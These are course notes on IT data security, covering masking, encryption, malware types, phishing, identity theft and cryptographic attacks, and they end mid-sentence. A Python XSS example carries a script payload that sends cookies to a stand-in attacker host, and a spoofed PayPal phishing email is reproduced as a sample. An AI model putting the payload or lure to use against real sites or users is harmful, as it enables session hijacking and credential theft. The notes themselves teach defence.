IT Data Security_Notes


IT DATA SECURITY

What is data security?

Data security is the practice of protecting digital information from unauthorized
access, corruption or theft throughout its entire lifecycle. This concept encompasses the entire
spectrum of information security. It includes the physical security of hardware and storage
devices, along with administrative and access controls. It also covers the logical security of
software applications and organizational policies and procedures.

Types of data security

To enable the confidentiality, integrity and availability of sensitive information,
organizations can implement the following data security measures:
1. Data Encryption
2. Data erasure
3. Data masking
4. Data resiliency

Encryption

Encryption uses an algorithm, driven by a secret key, to transform readable plaintext into
ciphertext that only holders of the corresponding key can turn back into readable data. File
and database encryption software serve as a final line of defense for sensitive volumes by
obscuring their contents through encryption or tokenization. Because the protection is only as
strong as the secrecy of the key, key management (generation, storage, rotation and
revocation) is part of the control rather than an optional extra; most encryption tools include
key management capabilities for this reason.

Data erasure

Data erasure uses software to overwrite every addressable location on a storage device and
then verifies that the data is unrecoverable, which makes it more secure than ordinary file
deletion or formatting, both of which leave the underlying data in place. Overwriting is not
reliable on flash media such as SSDs and USB drives, where wear levelling keeps copies the
host cannot address; for those, use the drive's built-in sanitize or secure-erase command, or
cryptographic erasure (destroying the key of an encrypted volume).

Data masking

By masking data, organizations can let teams develop applications or train people on data
that looks and behaves like real data. Personally identifiable information (PII) is masked where
necessary so that development can take place in compliant environments. Data masking creates
fake versions of an organization's data by changing the confidential values while keeping the
format, structure and statistical shape realistic. Once data is masked, the original values
cannot be reverse engineered or traced back from the masked copy without access to the
original dataset, so that original must itself be protected.

Common Data Masking Examples


1. Masking customer data
Almost all medium- to large-size companies today use a CRM to store and manage
customer data, including names, phone numbers, email addresses, employment history,
and more. Protecting customers' privacy (as well as that of active and inactive leads)
requires companies to take appropriate measures to ensure this data is not accessible to
unauthorized users. Data masking is an effective method for anonymizing CRM data while
maintaining data reporting and BI (Business Intelligence) functionality. Shuffling, data
aging, and pseudonymization are all effective methods for this data masking example.
2. Masking employee data
Most large companies manage employee data in an HCM system. By
masking an HCM, organizations can protect the sensitive information it
contains, such as names, addresses, phone numbers, salary information,
health insurance status, and more. Specific data masking methods, such as
data pseudonymization or shuffling, could keep sensitive employee
information secure while ensuring that the data remains usable for legitimate
purposes, by relevant data consumers.
3. Masking financial data
Financial firms use various systems to store and manage investment
portfolios for their clients. System databases would contain a variety of
sensitive financial information pertaining to customers’ investments,
including account numbers, account balances, transaction histories, names,
Social Security Numbers, addresses, and more. The firm could anonymize
its data by replacing sensitive information with dummy values, for example.
Anonymized data would still be accessible to authorized data consumers,
while upholding data security standards and complying with regulations
such as the Gramm-Leach-Bliley Act (GLBA).
4. Masking IP addresses
Companies that use log files to track the activities of users on their application,
website, or network may choose to mask the IP addresses in the log files. Encrypted
lookup substitution, redaction, or shuffling are all data masking methodologies
organizations could use to obscure real IP addresses. In this data masking example, the
organization could still use the masked IP addresses for testing or analytics purposes
while complying with user privacy laws such as GDPR, which treats IP addresses as
personal data.
5. Masking medical data
Hospital and health system databases, such as EHR systems, store
and manage a wide range of personal information about patients, including
names, address, phone numbers, medical histories, and more. To protect
patients’ privacy and ensure compliance with relevant regulations (such as
HIPAA), hospitals can mask EHR data using shuffling or data aging
techniques to restrict access to unauthorized parties. In this data masking
example, patient data can still be used for analysis and reporting but would
not expose the hospital or patient to risk.

Shuffle Masking
Shuffle masking replaces the value in a column with a value taken from the same
column in another row of the table: it permutes the values within the column rather
than altering them, so the masked column keeps exactly the same set of values and the
same distribution. You can restrict which rows take part based on a lookup condition or
a constraint. Date, numeric, and string data types can all be masked with shuffling.
For example, you might want to switch the first name values from one
customer to another customer in a table. The table includes the following
rows:

ID  First name  Last name
100 Kamatchi    Kartheeban
101 Ravi        Kumar
102 Ram         Gopalakrishnan
103 Santhosh    Pandian

When you apply shuffle masking, the rows contain the following data:

ID  First name  Last name
100 Ram         Kartheeban
101 Santhosh    Kumar
102 Kamatchi    Gopalakrishnan
103 Ravi        Pandian
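As an added example (not part of the original notes), the following Python implements shuffle masking on a constructed copy of the table above: it permutes one column among the rows that match an optional condition, refuses to leave any value in its original row, and then runs the checks a practitioner would make before releasing the masked copy. The `shuffle_column` and `masking_is_sound` functions and the seed value are this example's own.

```python
import random
from collections import Counter

# Constructed sample table with the same shape as the one in the notes:
# (customer_id, first_name, last_name).  Column index 1 is the first name.
ROWS = [
    (100, "Kamatchi", "Kartheeban"),
    (101, "Ravi", "Kumar"),
    (102, "Ram", "Gopalakrishnan"),
    (103, "Santhosh", "Pandian"),
]


def shuffle_column(rows, col, condition=lambda row: True, seed=None, max_tries=1000):
    """Return a copy of `rows` in which column `col` is permuted among the rows
    that satisfy `condition` (the notes' "lookup condition or constraint").
    Values are moved, never altered, so the column keeps its exact value
    distribution.  A derangement is enforced: no selected row keeps its own
    value, otherwise that row would effectively be unmasked.
    """
    rng = random.Random(seed)          # seeded only so the example is repeatable
    idx = [i for i, r in enumerate(rows) if condition(r)]
    values = [rows[i][col] for i in idx]
    if len(set(values)) < 2:
        raise ValueError("need at least two distinct values to shuffle")
    for _ in range(max_tries):
        perm = values[:]
        rng.shuffle(perm)
        if all(p != v for p, v in zip(perm, values)):
            break
    else:
        raise RuntimeError("no derangement found; values too repetitive")
    out = [list(r) for r in rows]
    for i, v in zip(idx, perm):
        out[i][col] = v
    return [tuple(r) for r in out]


def masking_is_sound(original, masked, col, condition=lambda row: True):
    """Checks to run before releasing the masked copy:
    - the masked column holds exactly the same multiset of values,
    - every other column is untouched,
    - every selected row received a different value,
    - rows outside the condition are unchanged.
    """
    same_values = (Counter(r[col] for r in original)
                   == Counter(r[col] for r in masked))
    others_same = all(o[:col] == m[:col] and o[col + 1:] == m[col + 1:]
                      for o, m in zip(original, masked))
    moved = all(o[col] != m[col] for o, m in zip(original, masked) if condition(o))
    untouched = all(o == m for o, m in zip(original, masked) if not condition(o))
    return same_values and others_same and moved and untouched


if __name__ == "__main__":
    masked = shuffle_column(ROWS, 1, seed=7)
    for row in masked:
        print(*row)
    print("sound:", masking_is_sound(ROWS, masked, 1))
```

Shuffling keeps every real value in the table, so it preserves distributions for BI and testing, but it is pseudonymisation rather than anonymisation: with four rows there are only nine possible derangements, and anyone who also holds the original table, or who knows which first name belongs to which customer, can undo it. Apply it to columns that are not identifying on their own and combine it with substitution for direct identifiers such as national ID numbers.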

Data resiliency

Resiliency depends on how well an organization endures or recovers from any type of
failure, from hardware faults to power outages and other events that affect data
availability. Speed of recovery is critical to minimizing impact.

Data resiliency refers to an organization's ability to recover from data breaches and
other types of data loss, immediately enact business continuity plans, effectively recover lost
assets and aggressively protect that organization's data moving forward.

Data security strategies

A comprehensive data security strategy incorporates people, processes and
technologies. Establishing appropriate controls and policies is as much a question of
organizational culture as it is of deploying the right tool set. This means making information
security a priority across all areas of the enterprise.

Consider the following facets in your data security strategy:


1. Physical security of servers and user devices
2. Access management and controls
3. Application security and patching
4. Backups
5. Employee education
6. Network and endpoint security monitoring and controls

Physical security of servers and user devices

You might store your data on premises, in a corporate data center or in the public cloud.
Regardless, the facilities need to be secured against intruders and have adequate fire
suppression and climate controls in place. A cloud provider assumes responsibility for the
physical protection of its data centers on your behalf, but under the shared-responsibility
model you remain responsible for how the data stored there is configured, encrypted and
accessed.

Access management and controls

Follow the principle of least-privilege access throughout your entire IT environment. This
means granting database, network and administrative account access to as few people as
possible, and only to individuals who need it to do their jobs. It also means reviewing that
access regularly and removing it when the need ends, since unused privileges are exactly
what an attacker holding a stolen credential will use.

Application security and patching

Keep all software, including operating systems, libraries, firmware and third-party
components, on supported versions and apply security patches as soon as possible after
release. Prioritize fixes for vulnerabilities that are known to be exploited, and test updates
where a failed upgrade would itself cause an outage.

Backups

Maintaining usable, thoroughly tested backup copies of all critical data is a core
component of any robust data security strategy. In addition, all backups should be subject to
the same physical and logical security controls that govern access to the primary databases
and core systems.

Employee education

Transform your employees into “human firewalls”. Teaching them the importance of
good security practices and password hygiene and training them to recognize social
engineering attacks can be vital in safeguarding your data.
Network and endpoint security monitoring and controls

Implementing a comprehensive suite of threat management, detection and response
tools in both your on-premises and cloud environments can lower risks and reduce the chance
of a breach.

Data Security Threats

 A data security threat is any action that could damage the confidentiality, integrity
or availability of data.
 Data security threats can come from a variety of sources, including hackers, insider
threats, natural disasters and human error.
 Data breaches can have serious consequences for businesses and consumers alike,
including financial losses, compromised identities and damaged reputations.
To protect their assets, companies need to do their due diligence and make sure they have a
system in place that will minimize data security threats by educating employees, monitoring
networks for vulnerabilities and more.

Types Of Data Security Threats

There are many data security threats that organizations face daily. Some of these
threats include
 malware
 ransomware
 phishing attacks and social engineering.

1. Malware is a type of software that is designed to harm or damage a computer system.
It can be installed on a system through various means, including email attachments,
infected websites and malicious adverts. Once installed, malware can delete files,
steal information or make changes to a system that can render it unusable.
2. Ransomware is a type of malware that encrypts a victim's files and demands a ransom
be paid to decrypt them; many current strains also copy the data out first and threaten
to publish it. This type of attack can be particularly damaging to organizations, as it can
result in the loss of important data and the exposure of confidential information.
3. Phishing attacks are another common type of threat that organizations face. These
attacks involve sending emails that appear to be from a trusted source, such as a bank
or other financial institution. The email will usually contain a link that leads to a
website that looks identical to the legitimate site. However, the website is designed to
steal the victim's login credentials.

How To Protect Data From Cybercriminals

 Data security is one of the most important aspects of online life. Without data
security, our personal information, financial information and other sensitive data
would be vulnerable to cybercriminals. There are many ways to protect your data
from cybercriminals, including using strong passwords, installing antivirus software
and using firewalls.

 One of the best ways to protect your data is to use a password manager. A password
manager helps you create and manage strong passwords, and it keeps all of your
passwords in one place. This makes it easier to create and remember complex
passwords, and it also makes it harder for cybercriminals to hack your account.

 Another way to protect your data is to install antivirus software. Antivirus software
helps to protect your computer from malware, which can include viruses, spyware and
other malicious software. Antivirus software can also help remove any existing
malware from your computer.

 Finally, you can use a firewall to protect your data. A firewall is a piece of hardware
or software that filters incoming and outgoing network traffic against a set of rules,
blocking anything the rules do not allow. Firewalls can be used to prevent cybercriminals
from reaching services on your computer, and outbound rules can also help stop malware
that is already present from sending your data out.
Types of Viruses

Armored Virus
 An armored virus is a computer virus that contains a variety of mechanisms
specifically coded to make its detection, analysis and decryption very difficult.
 One of these methods involves fooling anti-virus software into believing that the virus
resides somewhere other than its real location, which makes it difficult to detect and
remove.
 Another kind of armor is implemented by adding complicated and confusing code that
has no purpose other than to mask the virus and hinder virus researchers in creating an
effective countermeasure.

Companion Virus
 A companion virus is a type of computer virus that runs alongside a legitimate
program without touching that program's file.
 Instead of modifying the original executable, it creates a separate infected file with
a similar name that the operating system or shell chooses in preference to the real one,
leading the user to execute the virus unintentionally. The classic case is MS-DOS, which
runs PROGRAM.COM before PROGRAM.EXE when the user types PROGRAM.
 The virus then typically launches the genuine program so that nothing appears wrong,
while it spreads and can cause damage or allow unauthorized access to the infected
system.

Key Takeaways
1. A companion virus is a type of malware that disguises itself as a legitimate program
and runs in parallel with an existing executable file without altering or infecting it
directly.
2. It spreads by placing look-alike files next to other applications and is executed
when the user inadvertently launches the look-alike instead of the genuine program.
3. Preventing companion virus infections requires good security practices such as using
a reputable antivirus program, updating software regularly, avoiding downloads from
unknown sources, and checking the exact name and location of an executable before
running it.

Macro virus - Melissa virus

 A macro virus is a piece of malicious code written in the same macro language used
in everyday applications, such as Microsoft Word, Excel, and PowerPoint.
 The attack code commonly hides in documents and spreadsheets and is activated as
soon as you open the file and allow macros to run.
 Because the macro is interpreted by the application rather than by the operating
system, it can infect any computer on which that application runs, whatever the OS
(Windows or macOS, for example).
 With the release of Microsoft Office 2000 and all subsequent versions, Microsoft
disabled macros by default, and since 2022 Office also blocks macros in files downloaded
from the internet. Since then, it has become more difficult for bad actors to launch macro
viruses, and most modern lures rely on persuading the user to click "Enable Content".
 However, as long as macros are available to users, the risk of macro viruses remains
serious.

Multipartite Virus
 A multipartite virus is a type of fast-acting malware that attacks a device's boot
sector and executable files at the same time.
 Multipartite viruses are often considered more problematic than traditional computer
viruses because of their ability to spread in multiple ways.
 They are considered to be much more destructive than other viruses. Because a
multipartite virus infects a system through more than one vector, eradicating it means
purging every component from the entire system, both the boot sector and the infected
files.
 Failure to do so can result in the system being repeatedly re-infected by whichever
part of the virus was left behind.

Signs Your System is Infected


 Constant pop-up messages warning you that your computer has low memory. As the
virus spreads to the executable files, it consumes memory.
 The computer's hard drive may be reformatted. Specific types of multipartite viruses
do this in an effort to defeat anti-malware solutions. Even if anti-malware software
removes the infection, the virus may reformat the hard drive in an effort to reinfect the
computer.

Polymorphic Virus:
‘Poly’ refers to many and ‘morphic’ refers to forms; as the name suggests, a polymorphic
virus is a complicated computer virus that changes its form each time it propagates, to
avoid detection by antivirus signatures. It is a self-encrypting virus that pairs a mutation
engine with self-propagating program code.
A Polymorphic Virus Consists of:
 A decryption routine.
 An encrypted virus body.
 A mutation engine that generates randomized decryption routines.
 In polymorphic viruses, the mutation engine and virus body are
encrypted.
 When an infected program is executed, the virus decryption routine
gains control of the computer decrypts the virus body and mutation
engine. The control is then transferred to the virus which locates a
new program to infect.
 As the virus body is encrypted and the decryption routine also varies
from infection to infection, the virus scanners cannot scan for a fixed
signature or a fixed decryption routine making it difficult to detect.

Polymorphic malware in the wild:

 Examples include Emotet, a banking Trojan that steals sensitive information while
changing its form to mislead security tools, and the Win32/VirLock ransomware.

What is a stealth virus?


 A stealth virus is a computer virus that uses various mechanisms to avoid detection by
antivirus software.
 It takes its name from the term stealth, which describes doing something while avoiding
notice.
 Typically, a stealth virus hides in legitimate files, partitions or boot sectors of a
computing device without alerting the antivirus software or notifying the user of its
presence; classic stealth viruses intercept the system's file and disk reads so that a scanner
asking for an infected file is shown the clean original.
 Once injected into a computer, the virus enables the attackers to operate and gain control
over parts of the system or the entire system.
 A stealth virus has an intelligent architecture that makes it difficult to eliminate
completely from a computer system. It can rename itself and send copies to a different drive
or location, evading the system's antivirus software. Because any tool running on the
infected system may be deceived, the reliable remedy is to wipe the computer and rebuild it
from known-good media.
 Booting the computer from a clean removable disk, such as a USB drive, keeps the stealth
virus from running before the antivirus or anti-malware software scans the disk, so the
scanner sees the real contents. Sophisticated, up-to-date antivirus software can also help
reduce the risk of infection or eradicate a virus entirely.

Critical data for organizations


o Customer Information – The data associated to its customer should be of topmost
priority.
o Product Information – Protecting information about the existing products and the
products to be launched can be a high priority thing for many organizations.
o Employee Information – All the detailed personal information of the employees are
in the possession of most of the organizations.
o Company Information – An organization has various critical data which it needs to
protect.

Elements to consider for a better security mechanism


o Cost – The cost of a control plays an important role in the choice.
o The price of disruption – An organization should go with the option that causes the
least disruption while the data security mechanism is implemented.
o What there is to lose – Security needs must be of the utmost priority if the
organization's business relies on the trust of its customers.
o Where the potential threats are – An organization should always consider the biggest
threats that its sensitive data faces and direct its spending there.
Processes

Key Elements of Robust Data Protection Strategy

 A data protection strategy can help companies lessen the risks associated with various
data-related activities.
 It achieves this goal by identifying and tackling these risks while reducing the
possibility of other damaging events.
 Identifying the desired result and the necessary steps to build compelling data
protection strategies is crucial.
 Moreover, to ensure effectiveness, companies must clearly understand how these
strategies can address their specific concerns.

1. Transparent Data Risk Analysis


o The first and most important exercise for data protection is to assess the need
for tools and policies.
o There should be a clear and accurate assessment of the risks that the data
faces.
o This would also help to calculate the losses in the incident of a breach.
o Another critical aspect of an accurate risk assessment is that it will also clarify
the budgets needed for the strategy to be put in place.

2. Strong Data Encryption


o A good data protection strategy should ensure appropriate measures are in place to
prevent unnecessary risks.
o The companies that most effectively manage their data throughout its lifecycle will
have the best opportunities for success.
o Encrypting data at rest and in transit makes it more secure to begin with: data that is
stolen or intercepted is useless to threat actors who do not also obtain the key, which in
turn makes protecting the keys the critical task.

3. Stringent Data Backup and Recovery Tools


o Another notable element of any data protection plan is the ability to recover
from any data breach or attack.
o To achieve this, companies should keep regular backups of all critical data and
systems.
o Even if there is an incident, they will be able to restore data and neutralize
cyber threats.
o Threats that can disrupt a business are practically infinite.
o Updating policies and procedures regularly allows an organization to be well-
prepared to take on threats.
o Furthermore, the type of data that needs to be backed up, its frequency, and
storage location should also be identified in advance.
4. Zero Trust Access Policies
o To protect data, it is critical to ensure that all reasonable precautions are in place.
o Zero trust means that no request is trusted merely because of where it comes from;
every access to data is authenticated and authorized explicitly.
o A data protection strategy needs to be stringent about strong, multi-factor
authentication of users before they can access data. The primary aim is to prevent all
unauthorized access, which plays a big role in blocking attacks on the network and
infrastructure.
o Deploying data breach prevention tools such as antivirus and antispyware utilities
can offer improved threat protection. Enterprises can use firewalls and other perimeter
security hardware and software for added protection, although zero trust treats the
perimeter as one layer rather than as the boundary of trust.

5. Meeting Data Storage Safety Standards and Regulatory Compliance

o Complying with domestic and foreign data protection laws is vital in today’s
business world. Businesses can also enhance their efficiency and profitability
by investing in data compliance.
o Effective data compliance practices keep company data up-to-date and
accurate. It helps protect it from costly errors and improves the overall quality
of business operations.
o With valuable data compliance strategies, businesses can significantly reduce
the time and money spent on handling data. Then it becomes an investment
that pays off both in the short and long term, ensuring success and peace of
mind for all involved.

Phishing Attacks

Phishing attacks are a type of cyber-attack where an attacker sends a fake message,
email, or link that appears to be from a legitimate source, aiming to trick victims into
revealing sensitive information or installing malware.
Two attacks that are frequently used together with phishing, against the victim's
connection or browser session, are described below:
 on-path attack
 cross-site scripting attacks

i. on-path attack
 On-path attackers place themselves between two devices (often a web
browser and a web server) and intercept or modify communications
between the two.
 The attackers can then collect information as well as impersonate
either of the two agents.
 In addition to websites, these attacks can target email
communications, DNS lookups, and public WiFi networks.

Example:
 You can think of an on-path attacker like a rogue postal worker who
sits in a post office and intercepts letters written between two people.
 This postal worker can read private messages and even edit the
contents of those letters before passing them along to their intended
recipients.
 In a more modern example, an on-path attacker can sit between a user
and the website they want to visit and collect their username and
password.
 This can be done by targeting a plain HTTP connection between the user and the
website; hijacking this connection lets an attacker act as a proxy, collecting and
modifying information sent between the user and the site. HTTPS with properly validated
certificates prevents this, which is why browsers warn about certificate errors and why an
attacker will try to strip or downgrade the encrypted connection.
 Alternately the attacker can steal a user’s cookies (small pieces of data created by a
website and stored on a user’s computer for identification and other purposes).
 These stolen cookies can be used to hijack a user’s session, letting an attacker
impersonate that user on the site; marking session cookies Secure so they are never sent
over plain HTTP removes this avenue.

cross-site scripting
 Cross-site scripting (XSS) is an exploit where the attacker injects script into a
legitimate website so that it executes in the victim's browser when the victim loads the
page. Because the script runs with the site's origin, it can read the victim's cookies and
act on the site as that user. The malicious code can be inserted in several ways.
 Most commonly it is either carried in a URL parameter that the page reflects back
unencoded (reflected XSS) or posted directly onto a page that displays user-generated
content, where it is stored and served to every visitor (stored XSS).
 In more technical terms, cross-site scripting is a client-side code injection attack: the
root cause is user-controlled data being written into HTML without output encoding.
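An added example in Python, not taken from the original notes, showing the reflected variant end to end: a constructed request URL carries a payload in the `q` parameter, a vulnerable handler interpolates it into HTML unescaped, and a hardened handler output-encodes it with `html.escape`. The URL, the handler functions and the `is_script_injected` check are this example's own.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed request URL: the `q` parameter carries a percent-encoded
# <script> payload that sends document.cookie to an attacker-controlled host.
REQUEST_URL = ("https://example.test/search?q="
               "%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fevil.test%2F"
               "%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E")


def query_param(url, name):
    """Decode one query-string parameter the way a web framework would."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_vulnerable(term):
    """Reflects the search term into the page unencoded.  The browser parses
    the payload as a real <script> element and runs it in the site's origin."""
    return f"<p>Results for: {term}</p>"


def render_safe(term):
    """Output-encodes the term for an HTML text/attribute context, so the
    same bytes render as literal characters instead of markup."""
    return f"<p>Results for: {html.escape(term, quote=True)}</p>"


def is_script_injected(page):
    """Crude check used here only to show the difference: does the rendered
    page contain a script tag that the application did not write itself?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    term = query_param(REQUEST_URL, "q")
    print("decoded input:", term)
    print("vulnerable:", render_vulnerable(term))
    print("hardened:  ", render_safe(term))
```

Encoding must match the output context: `html.escape` is right for HTML text and attribute values, but a value placed inside a `<script>` block, a URL or a CSS property needs that context's encoder, and a Content-Security-Policy that forbids inline scripts limits the damage when an encoder is missed.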

Types of Phishing

1. Email Phishing:
 Attacker sends a fake email that appears to be from a legitimate source
(e.g., bank) asking for sensitive information (e.g., login credentials).
 Example: An email that looks like it's from your bank, asking you to click
a link and enter your login details.
 The link leads to a fake website that steals your login credentials.
Example:

Subject: Urgent: Your Account Will Be Suspended
From: "support@paypal.com" (spoofed email address)
Body:
"Dear valued customer,

We've noticed suspicious activity on your PayPal account. To protect your account, we
need you to verify your identity. Please click the link below to confirm your login
credentials:

[Insert suspicious link here]

If you don't take action, your account will be suspended within 24 hours.

Best regards,

2. Spear Phishing:
 An email tailored to a specific individual, using their name and company
information.
 The email appears to be from a colleague or supervisor, asking for sensitive data.
3. Whaling:
 An email targeting high-level executives, attempting to trick them into revealing
sensitive information.
 The email may appear to be from a government agency or legal authority.
4. Smishing:
 An SMS or text message claiming to be from a bank or service provider.
 The message asks you to click a link or provide sensitive information.
5. Vishing or Voice Phishing:
 A voice call claiming to be from a bank or service provider.
 The caller asks for sensitive information or directs you to a fake website.
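An added example, not from the original notes: the checks a mail gateway or an analyst applies to a lure like the email-phishing sample above, written in Python against two constructed messages (the headers, domains and URLs are invented). It compares the visible From domain with the envelope sender, reads the receiving server's Authentication-Results header for the SPF and DKIM outcomes, looks for urgency language, and flags links whose host is not under the sender's domain. The `phishing_indicators` function and its heuristics are this example's own and are indicators, not a verdict.

```python
import email
import re
from email import policy
from urllib.parse import urlsplit

# Two constructed messages.  Return-Path and Authentication-Results are the
# headers a receiving mail server adds; everything else is what the sender
# chose to put there.  Domains and URLs are invented.
LURE = """\
Return-Path: <bounce@mail-relay-9921.example>
Authentication-Results: mx.example.test; spf=fail smtp.mailfrom=mail-relay-9921.example; dkim=none
From: "PayPal Support" <support@paypal.com>
To: victim@example.test
Subject: Urgent: Your Account Will Be Suspended
Content-Type: text/plain; charset=utf-8

Dear valued customer,

We've noticed suspicious activity on your PayPal account. Please confirm
your login credentials within 24 hours: https://paypal.com.account-verify.example/login
"""

LEGITIMATE = """\
Return-Path: <bounce@paypal.com>
Authentication-Results: mx.example.test; spf=pass smtp.mailfrom=paypal.com; dkim=pass header.d=paypal.com
From: "PayPal" <service@paypal.com>
To: victim@example.test
Subject: Your monthly statement is ready
Content-Type: text/plain; charset=utf-8

Your statement is available at https://www.paypal.com/statements
"""

URGENCY = re.compile(r"\b(urgent|suspended|within 24 hours|verify your identity)\b", re.I)


def domain_of(addr):
    """Domain part of an address such as '<bounce@x.example>' -> 'x.example'."""
    return str(addr).strip().strip("<>").rsplit("@", 1)[-1].lower()


def phishing_indicators(raw):
    """Return human-readable reasons the message looks like a lure.  An empty
    list means none of these heuristics fired, not that the mail is safe."""
    msg = email.message_from_string(raw, policy=policy.default)
    flags = []
    from_dom = domain_of(msg["From"].addresses[0].addr_spec)

    # 1. The envelope sender (where bounces go) should match the visible From.
    envelope = msg["Return-Path"]
    if envelope and domain_of(envelope) != from_dom:
        flags.append(f"envelope sender {domain_of(envelope)} differs from From domain {from_dom}")

    # 2. The receiving server's own SPF/DKIM verdicts, not the sender's claims.
    auth = str(msg["Authentication-Results"] or "")
    if re.search(r"\bspf=(fail|softfail|none)\b", auth):
        flags.append("SPF did not pass for the claimed sender")
    if re.search(r"\bdkim=(fail|none)\b", auth):
        flags.append("no valid DKIM signature")

    # 3. Pressure language in subject or body.
    body = msg.get_body(preferencelist=("plain",)).get_content()
    if URGENCY.search(f"{msg['Subject']} {body}"):
        flags.append("urgency or threat language")

    # 4. Links whose host is not the sender's domain or a subdomain of it.
    for url in re.findall(r"https?://\S+", body):
        host = (urlsplit(url).hostname or "").lower()
        if host != from_dom and not host.endswith("." + from_dom):
            flags.append(f"link host {host} is not under {from_dom}")
    return flags


if __name__ == "__main__":
    for name, raw in (("lure", LURE), ("legitimate", LEGITIMATE)):
        print(name, "->", phishing_indicators(raw) or "no indicators")
```

The host check is deliberately literal: paypal.com.account-verify.example starts with the brand name but its registrable domain is account-verify.example, which is exactly the trick the sample relies on.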

Identity theft
Identity theft occurs when someone uses your personal information
without your permission to commit fraud or other crimes. Here's an example:

Example:
John's wallet is stolen, containing his driver's license, credit cards, and
Social Security card. The thief, Jane, uses John's information to:
1. Open a new credit card account in John's name, charging thousands of
dollars.
2. Apply for a loan in John's name, using his Social Security number and
credit history.
3. Use John's driver's license to pose as him and commit crimes, resulting in
John receiving traffic tickets and even an arrest warrant.

Types of identity theft:


1. Financial identity theft: Using someone's information to access their
financial resources or obtain credit.
2. Criminal identity theft: Using someone's identity to commit crimes,
resulting in the victim facing legal consequences.
3. Identity cloning: Creating a new identity using someone's information,
often to evade law enforcement or hide one's own identity.
4. Medical identity theft: Using someone's information to obtain medical
care or prescription drugs.
5. Synthetic identity theft: Creating a new identity using a combination
of real and fake information.
Warning signs of identity theft:
 Unexplained credit card charges or accounts.
 Mysterious loans or credit inquiries.
 Missing mail or bills.
 Unfamiliar accounts on credit reports.
 Receiving strange calls or emails asking for personal information.

Protection tips:
 Monitor credit reports and accounts regularly.
 Use strong, unique passwords and two-factor authentication.
 Keep personal documents secure and shred sensitive information.
 Be cautious when sharing personal information online or in public.
 Use identity theft protection services or credit monitoring tools.
Unit - II
Cryptographic Attacks
What is cryptography?
Cryptography is a security mechanism for storing and transmitting sensitive data such
that only the sender and the intended receiver can read or understand it. Key(s) are used to
encode (at the sender's end) and decode (at the receiver's end) the data. Encryption is the
process of converting plaintext or data into ciphertext or encoded data (that is not readable to
everyone). Converting the ciphertext or encrypted data to a readable form or decoded version
is called decryption.

What are cryptography attacks?


A cryptographic attack is a method used by hackers to target cryptographic solutions
like ciphertext, encryption keys, etc. These attacks aim to retrieve the plaintext from the
ciphertext or decode the encrypted data. Hackers may attempt to bypass the security of a
cryptographic system by discovering weaknesses and flaws in cryptography techniques,
cryptographic protocol, encryption algorithms, or key management strategy.

Passive and active attacks


A cryptography attack can be either passive or active.

 Passive attacks: Passive cryptography attacks intend to obtain unauthorized access to
sensitive data or information by intercepting or eavesdropping on general communication.
In this situation, the data and the communication remain intact and are not tampered with.
The attacker only gains access to the data.
 Active attacks: On the other hand, active cryptography attacks involve some kind of
modification of the data or communication. In this case, the attacker not only gains access
to the data but also tampers with it.

Types of cryptography attacks


Depending on the type of cryptographic system in place and the information available to
the attacker, these attacks can be broadly classified into six types:

 Brute force attack

In a brute force attack, the attacker tries every possible key, whether a symmetric key or
a private key, until one decrypts the message to meaningful plaintext. The work is decided
by the key size: an 8-bit key gives only 2^8 = 256 possibilities, which can be tried in an
instant, while a 128-bit key gives 2^128, which is far beyond any feasible search. The
attacker needs only to know the algorithm (which should be assumed public, and is usually
available as open-source code) and to have a way of recognising the correct plaintext.

Types of Brute Force Attacks

Each brute force attack can use different methods to uncover your sensitive data. You
might be exposed to any of the following popular brute force methods:
1. Simple brute force attack: It uses a systematic approach to 'guess' credentials that
does not rely on outside logic, trying candidates one after another, with or without the
help of software tools. It can reveal extremely simple passwords and PINs.
2. Dictionary attacks: It guesses usernames or passwords using a
dictionary of possible strings or phrases. A hacker chooses a target
and runs possible passwords against that username. Dictionary
attacks are the most basic tool in brute force attacks. While not
necessarily being brute force attacks in themselves, these are often
used as an important component for password cracking.
3. Hybrid brute force attacks: It starts from external logic to
determine which password variation may be most likely to succeed
and then continues with the simple approach to try many possible
variations. A hybrid attack usually mixes dictionary and brute force
attacks. These attacks are used to figure out combo passwords that
mix common words with random characters.
4. Rainbow table attacks: A rainbow table is a pre-computed table for reversing
cryptographic hash functions. It can recover passwords up to a certain length, drawn from
a limited character set, from their unsalted hashes; storing hashes with a per-user random
salt defeats the pre-computation.
5. Reverse brute force attack: A reverse brute force attack reverses
the attack strategy by starting with a known password. It uses a
common password or collection of passwords against many possible
usernames. Then hackers search millions of usernames until they
find a match. Targets a network of users for which the attackers
have previously obtained data. Many of these criminals start with
leaked passwords that are available online from existing data
breaches.
6. Credential stuffing: It uses previously-known username and password pairs, trying
them against multiple websites. If a hacker has a combination that works for one website,
they will try it on many others as well. Because users are known to reuse login details
across many websites, those users are the prime targets of this attack, which exploits the
fact that many people have the same username and password across different systems.
Brute Force Attack Tools
Guessing a password for a particular user or site can take a long time, so hackers have
developed tools to do this task faster.

 Ciphertext-only attack

In this attack vector, the attacker gains access to a collection of
ciphertexts. Although the attacker has no access to the plaintext, they may
still be able to recover the plaintext of messages in the collection. Through
this attack technique, the attacker can occasionally determine the key.

 Chosen plaintext attack

In this attack model, the cybercriminal can choose arbitrary plaintext data
to obtain the ciphertext. It simplifies the attacker's task of resolving the
encryption key. One well-known example of this type of attack is the
differential cryptanalysis performed on block ciphers.
Let’s now consider the chosen-plaintext attack.
In this case, we can relax the previous constraint and assume we aren’t
certain of the encryption algorithm being used. However, we can still choose a
set of plaintexts and compare them with the resulting ciphertexts in order to
learn something about the encryption algorithm and its associated key.

If we begin with the plaintext, plaintext=11111111, we will obtain
the ciphertext=01010101 as we discussed earlier. We could then consider
changing the last bit of the plaintext and observe how the ciphertext
changes accordingly. In doing so, and in changing every remaining bit of the
plaintext in sequence, we would develop the following table of associations:

Plaintext   Ciphertext
11111111    01010101
11111110    01010100
11111101    01010111
11111011    01010001
11110111    01011101
11101111    01000101
11011111    01110101
10111111    00010101
01111111    11010101

In varying each individual bit of the plaintext and comparing the corresponding
encrypted text, we could notice that the bit we vary is consistently negated in
the encryption process. We could also notice that, as one bit varies, the
remaining ones are left untouched: in this case, we should strongly suspect that
the encryption involves a bit-wise operator of some kind; that would, in turn,
significantly restrict the search space of the possible encryption algorithms
that generate the ciphertexts.

 Chosen ciphertext attack

In this attack model, the cybercriminal analyzes a chosen ciphertext
corresponding to its plaintext. The attacker tries to obtain a secret key or
